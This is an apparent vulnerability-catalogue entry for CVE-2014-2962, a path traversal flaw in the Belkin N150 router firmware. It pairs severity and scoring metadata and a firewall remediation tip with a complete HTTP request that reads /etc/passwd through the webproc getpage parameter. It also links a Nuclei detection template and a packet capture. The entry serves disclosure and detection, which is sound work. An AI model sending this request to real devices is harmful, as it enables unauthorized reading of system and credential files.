| Title | Belkin N150 Router 1.00.08/1.00.09 - Path Traversal |
|---|---|
| Author | daffainfo |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system. |
| Remediation | Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. |
| CVSS Score | 7.8 |
| EPSS Score | 0.87901 |
| CVE ID | CVE-2014-2962 |
| CWE ID | CWE-22 |
| Tags | cve2014 cve lfi router firmware traversal belkin vuln |
A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.14
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-2962.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-2962.pcap
N/AN/A